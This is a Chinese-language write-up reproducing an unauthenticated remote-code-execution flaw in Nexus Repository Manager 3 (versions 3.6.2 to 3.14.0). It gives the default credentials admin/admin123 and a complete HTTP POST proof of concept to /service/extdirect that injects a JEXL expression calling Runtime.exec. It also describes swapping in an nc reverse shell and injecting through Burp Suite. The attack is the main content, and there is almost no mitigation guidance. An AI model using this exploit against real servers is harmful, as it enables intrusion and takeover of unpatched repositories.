本文共 1277 字，大约阅读时间需要 4 分钟。

漏洞背景

Nexus Repository Manager 3是一款软件仓库，可以用来存储和分发Maven，NuGET等软件源仓库。其3.14.0及之前版本中，存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能，而这处功能存在未授权访问漏洞，将可以导致任意命令执行漏洞。2019年2月5日Sonatype发布安全公告，在Nexus Repository Manager 3中由于存在访问控制措施的不足，未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码，从而达到远程代码执行的目的。

影响范围

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

复现条件

1. 未授权的访问
2. 弱口令访问
3. jar包上传

漏洞利用

nexus默认端口为8081，且存在未授权访问（3.15起关闭此功能），通过弱口令admin/admin123进入

》》cat T1.java》》public class T1 {   	public static void main(String[] args) {   	System.out.println("hello world");	}	}》》javac T1.java》》jar cvf T1.jar T1.class

POST /service/extdirect HTTP/1.1Host: IP:8081User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Type: application/jsonContent-Length: 308Connection: close{   "action":"coreui_Component","method":"previewAssets","data":[{   "page":1,"start":0,"limit":25,"filter":[{   "property":"repositoryName","value":"*"},{   "property":"expression","value":"''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"},{   "property":"type","value":"jexl"}]}],"type":"rpc","tid":4}

将PoC放入Burpsuite，更改下IP，我这边直接用的nc反弹shell

将选项改为All Repositorles后点击Prevlew抓包

expression和type的value处进行注入，即可达到与PoC同样的效果。